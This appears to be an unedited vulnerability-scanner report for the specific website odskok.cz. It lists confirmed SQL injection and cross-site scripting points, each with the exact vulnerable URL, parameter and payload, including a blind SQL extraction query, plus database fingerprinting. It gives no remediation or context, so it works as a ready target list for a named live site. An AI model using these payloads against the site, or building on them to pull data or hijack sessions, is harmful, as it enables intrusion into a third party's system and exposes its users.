odskok.cz

1. ||| Boolean Based SQL Injection
2.  
3. Severity : Critical
4. Confirmation : Confirmed
5. Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=2 AND 'NS='ss
6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
7. Parameter Name: id_od
8. Parameter Type: Querystring
9. Attack Pattern: 2 AND 'NS='ss
10.  
11. Severity : Critical
12. Confirmation : Confirmed
13. Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php?slovo=3&id=-1 OR 17-7=10
14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
15. Parameter Name: id
16. Parameter Type: Querystring
17. Attack Pattern: -1 OR 17-7=10
18.  
19. ||| [High Possibility] SQL Injection
20.  
21. Severity : Critical
22. Confirmation : Confirmed
23. Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=%27&id_od=2
24. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
25. Parameter Name: idk
26. Parameter Type: Querystring
27. Attack Pattern: %27
28.  
29. Severity : Critical
30. Confirmation : Confirmed
31. Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=%27
32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
33. Parameter Name: id_od
34. Parameter Type: Querystring
35. Attack Pattern: %27
36.  
37. ||| XSS (Cross-site Scripting)
38.  
39. Severity : Important
40. Confirmation : Confirmed
41. Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk='><script>alert(9)</script>&id_od=2
42. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
43. Parameter Name: idk
44. Parameter Type: Querystring
45. Attack Pattern: '><script>alert(9)</script>
46.  
47. Severity : Important
48. Confirmation : Confirmed
49. Vulnerable URL : http://www.odskok.cz/o_index.php?ap=hled&hledej=8&najdi=Vyhledej&retezec='"--></style></script><script>alert(0x000222)</script>
50. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
51. Parameter Name: retezec
52. Parameter Type: Querystring
53. Attack Pattern: '"--></style></script><script>alert(0x000222)</script>
54.  
55. Severity : Important
56. Confirmation : Confirmed
57. Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?id=" stYle="x:expre/**/ssion(alert(9)) &slovo=3
58. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
59. Parameter Name: id
60. Parameter Type: Querystring
61. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
62.  
63. Severity : Important
64. Confirmation : Confirmed
65. Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?id=110&slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
66. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
67. Parameter Name: slovo
68. Parameter Type: Querystring
69. Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
70.  
71. Severity : Important
72. Confirmation : Confirmed
73. Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php?id=" stYle=x:expre/**/ssion(alert(9)) ns=" &slovo=3
74. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
75. Parameter Name: id
76. Parameter Type: Querystring
77. Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
78.  
79. Severity : Important
80. Confirmation : Confirmed
81. Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php3?slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
82. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
83. Parameter Name: slovo
84. Parameter Type: Querystring
85. Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
86.  
87. Severity : Important
88. Confirmation : Confirmed
89. Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x0003BC)</script>
90. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
91. Parameter Name: url
92. Parameter Type: Querystring
93. Attack Pattern: '"--></style></script><script>alert(0x0003BC)</script>
94.  
95. Severity : Important
96. Confirmation : Confirmed
97. Vulnerable URL : http://www.odskok.cz/odskok/o_f_znamka.php?id_od='"--></style></script><script>alert(0x0003CF)</script>
98. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
99. Parameter Name: id_od
100. Parameter Type: Querystring
101. Attack Pattern: '"--></style></script><script>alert(0x0003CF)</script>
102.  
103. Severity : Important
104. Confirmation : Confirmed
105. Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x000447)</script>&name=Mobile
106. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
107. Parameter Name: url
108. Parameter Type: Querystring
109. Attack Pattern: '"--></style></script><script>alert(0x000447)</script>
110.  
111. Severity : Important
112. Confirmation : Confirmed
113. Vulnerable URL : http://www.odskok.cz/sluzby/br.php?brana=" stYle="x:expre/**/ssion(alert(9)) &co=1
114. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
115. Parameter Name: brana
116. Parameter Type: Querystring
117. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
118.  
119. Severity : Important
120. Confirmation : Confirmed
121. Vulnerable URL : http://www.odskok.cz/sluzby/robot_n.php?id=498&slovo=" stYle=x:expre/**/ssion(alert(9)) ns="
122. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
123. Parameter Name: slovo
124. Parameter Type: Querystring
125. Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
126.  
127. Severity : Important
128. Confirmation : Confirmed
129. Vulnerable URL : http://www.odskok.cz/odskok/o_f_pratele.php?url='"--></style></script><script>alert(0x0004B0)</script>&a_bid=59
130. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
131. Parameter Name: url
132. Parameter Type: Querystring
133. Attack Pattern: '"--></style></script><script>alert(0x0004B0)</script>
134.  
135. Severity : Important
136. Confirmation : Confirmed
137. Vulnerable URL : http://www.odskok.cz/sluzby/nove_o_hry.php?url=" stYle=x:expre/**/ssion(alert(9)) ns="
138. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
139. Parameter Name: url
140. Parameter Type: Querystring
141. Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
142.  
143. Severity : Important
144. Confirmation : Confirmed
145. Vulnerable URL : http://www.odskok.cz/o_index.php
146. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
147. Parameter Name: datum
148. Parameter Type: Post
149. Attack Pattern: --><script>alert(9)</script>
150.  
151. Severity : Important
152. Confirmation : Confirmed
153. Vulnerable URL : http://www.odskok.cz/o_index.php
154. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
155. Parameter Name: email
156. Parameter Type: Post
157. Attack Pattern: "><script>alert(9)</script>
158.  
159. Severity : Important
160. Confirmation : Confirmed
161. Vulnerable URL : http://www.odskok.cz/sluzby/br.php?brana=1&co=" stYle=x:expre/**/ssion(alert(9)) ns="
162. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
163. Parameter Name: co
164. Parameter Type: Querystring
165. Attack Pattern: " stYle=x:expre/**/ssion(alert(9)) ns="
166.  
167. ||| [Possible] Cross-site Scripting
168.  
169. Severity : Medium
170. Confirmation : Confirmed
171. Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php3?slovo='"--></style></script><script>alert(0x0004F6)</script>&id=3
172. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
173. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
174. Parameter Name: slovo
175. Parameter Type: Querystring
176. Attack Pattern: '"--></style></script><script>netsparker(0x0004F6)</script>
177.  
178. Severity : Medium
179. Confirmation : Confirmed
180. Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php?slovo='"--></style></script><script>alert(0x00050F)</script>&id=3
181. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
182. Notes: This page responses with HTTP redirect status therefore detected XSS vulnerability might not be exploitable in many conditions however it still indicates lack of correct filtering and should be addressed.
183. Parameter Name: slovo
184. Parameter Type: Querystring
185. Attack Pattern: '"--></style></script><script>netsparker(0x00050F)</script>
186.  
187. ||| [Possible] PHP Source Code Disclosure
188.  
189. Severity : Medium
190. Confirmation : Confirmed
191. Vulnerable URL : http://www.odskok.cz/sluzby/robot_menu.html
192. Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
193.  
194. ||| Database Error Message
195.  
196. Severity : Low
197. Confirmation : Confirmed
198. Vulnerable URL : http://www.odskok.cz/sluzby/robot_text.php3?slovo=&id=
199. Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
200.  
201. ||| MySQL Database Identified
202.  
203. Severity : Information
204. Confirmation : Confirmed
205. Vulnerable URL : http://www.odskok.cz/o_index.php?ap=s1&idk=2&id_od=-1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))
206. Parameter Name: id_od
207. Parameter Type: Querystring
208. Attack Pattern: -1 OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))